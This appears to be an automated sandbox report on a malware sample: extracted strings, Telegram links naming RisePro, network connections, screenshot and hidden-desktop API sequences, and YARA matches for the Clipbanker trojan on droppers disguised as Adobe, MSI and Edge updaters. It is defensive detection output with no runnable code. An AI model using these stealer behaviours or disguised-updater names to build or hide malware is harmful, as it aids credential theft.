Source: file.exe, 00000000.00000002.4492597224.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52J-
Source: file.exe, 00000000.00000002.4492597224.00000000016D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52e
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr String found in binary or memory: https://sectigo.com/CPS0
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.4493848204.0000000006306000.00000004.00000020.00020000.00000000.sdmp, Xfp4MT9n1IFhi1hjXC4bx59.zip.0.dr String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.4491758159.0000000000C32000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2112251123.0000000006658000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/n
Source: file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/txt-
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49720 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0712C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC, 0_2_0712C230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07109080 OpenDesktopA,CreateDesktopA, 0_2_07109080

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.2664724188.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2664724188.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000007.00000002.2225780219.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000007.00000002.2225780219.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.2581861448.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2581861448.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000015.00000002.2271675447.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000015.00000002.2271675447.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.4491626286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.4491626286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2280442151.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2280442151.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000018.00000002.2338388724.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000018.00000002.2338388724.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.2280260250.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.2280260250.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000019.00000002.2418733700.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.2418733700.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2502350940.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001B.00000002.2502350940.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000009.00000002.2237350330.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000009.00000002.2237350330.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.2241108576.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2241108576.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710C480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess, 0_2_0710C480
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B2A790 0_2_00B2A790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B2B010 0_2_00B2B010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCC0A0 0_2_00BCC0A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFA040 0_2_00AFA040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B18314 0_2_00B18314
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DB842B 0_2_00DB842B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0ABFF 0_2_00B0ABFF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF0DB0 0_2_00AF0DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B1CEA1 0_2_00B1CEA1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B1F050 0_2_00B1F050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B071F0 0_2_00B071F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D83134 0_2_00D83134
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E53344 0_2_00E53344
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B23450 0_2_00B23450
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BCF450 0_2_00BCF450
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01A30 0_2_00B01A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CA3BC5 0_2_00CA3BC5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710A230 0_2_0710A230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0712C990 0_2_0712C990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0712D540 0_2_0712D540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07113B60 0_2_07113B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07109A10 0_2_07109A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07121980 0_2_07121980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710C760 0_2_0710C760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0714E63B 0_2_0714E63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_071124B0 0_2_071124B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07124370 0_2_07124370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0714E2DC 0_2_0714E2DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0715C010 0_2_0715C010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07128F60 0_2_07128F60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07110B90 0_2_07110B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07104910 0_2_07104910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0714E999 0_2_0714E999
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07152840 0_2_07152840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07161714 0_2_07161714
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0715F43E 0_2_0715F43E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_071272F0 0_2_071272F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0714DF9A 0_2_0714DF9A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710FE50 0_2_0710FE50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07125AB0 0_2_07125AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710F9D0 0_2_0710F9D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07147880 0_2_07147880
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 07146140 appears 58 times
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2207103891.0000000006E66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2258565037.00000000070E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2262863469.00000000070E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2206091621.0000000006E6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000000.2030040447.00000000011D7000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs file.exe
Source: file.exe, 00000000.00000003.2259863441.00000000070E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2210534048.0000000006E6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
